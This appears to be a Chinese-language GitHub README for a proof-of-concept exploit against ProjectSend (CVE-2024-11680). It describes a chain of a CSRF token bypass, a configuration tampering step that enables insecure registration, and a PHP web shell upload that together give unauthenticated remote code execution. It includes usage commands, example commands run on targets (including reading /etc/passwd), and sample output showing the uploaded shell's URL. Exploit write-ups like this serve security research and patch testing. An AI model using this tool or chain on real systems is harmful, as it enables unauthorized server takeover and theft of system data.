qucklecrabik/CVE-2024-11680
GitHub: qucklecrabik/CVE-2024-11680
自动化利用 ProjectSend CVE-2024-11680 漏洞链(CSRF 绕过+配置篡改+文件上传),实现未授权远程代码执行的概念验证脚本。
Stars: 0 | Forks: 0
# ProjectSend CVE-2024-11680 漏洞利用
这是 CVE-2024-11680 的概念验证漏洞利用程序,该漏洞是 ProjectSend 中存在的一个未授权配置修改和 web shell 上传漏洞。
## 描述
该漏洞利用程序利用了 ProjectSend 中的多个漏洞:
- 允许更改配置的 CSRF token 绕过
- 不安全的客户端注册设置
- 导致远程代码执行的无限制文件上传
## 要求
- Python 3.x
- 所需 Python 包:
pip install requests colorama
## 使用方法
```
python3 exploit.py -u -c
```
### 参数
- `-u`, `--url`: 目标 URL(例如,http://target.com/projectsend)
- `-c`, `--command`: 在目标上执行的命令(默认值:id)
### 示例
```
# 获取 Python 版本
python3 exploit.py -u http://target.com/projectsend -c "python3 -V"
# 列出目录内容
python3 exploit.py -u http://target.com/projectsend -c "ls -la"
# 获取系统信息
python3 exploit.py -u http://target.com/projectsend -c "uname -a"
# 读取 passwd 文件
python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"
```
## 工作原理
1. **侦察**:获取 CSRF token 并验证目标漏洞
2. **配置操纵**:启用不安全的客户端注册选项
3. **用户注册**:创建一个具有自动批准功能的新客户端账户
4. **文件上传**:上传一个扩展名为 .phtml 的 PHP web shell
5. **命令执行**:通过上传的 shell 执行指定的命令
## 功能特性
- 自动提取 CSRF token
- 随机生成用户凭据
- 智能文件命名和时间戳检测
- 带颜色的输出以提高可见性
- 内置命令执行功能
## 法律声明
本工具仅供教育目的。请负责任地使用,并且仅在您获得明确授权进行测试的系统上使用。
## 参考
- [CVE-2024-11680](https://www.cve.org/CVERecord?id=CVE-2024-11680)
## 示例输出
```
[+] Target is vulnerable
[+] Insecure options enabled
[+] User registered successfully.
[+] New username: NoDLQWYF
[+] New password: X02A3g9LuN4S
[+] File uploaded: kLoISqdA.phtml
[+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
[+] Command Output:
Python 3.9.2
```
标签:CISA项目, CSRF绕过, CVE-2024-11680, OpenVAS, PHP, PoC, ProjectSend, Python, RCE, URL发现, Webshell, Web安全, 协议分析, 命令注入, 安全检测, 数据展示, 文件上传漏洞, 无后门, 暴力破解, 权限提升, 红队, 编程工具, 网络信息收集, 网络安全, 蓝队分析, 身份验证绕过, 远程代码执行, 隐私保护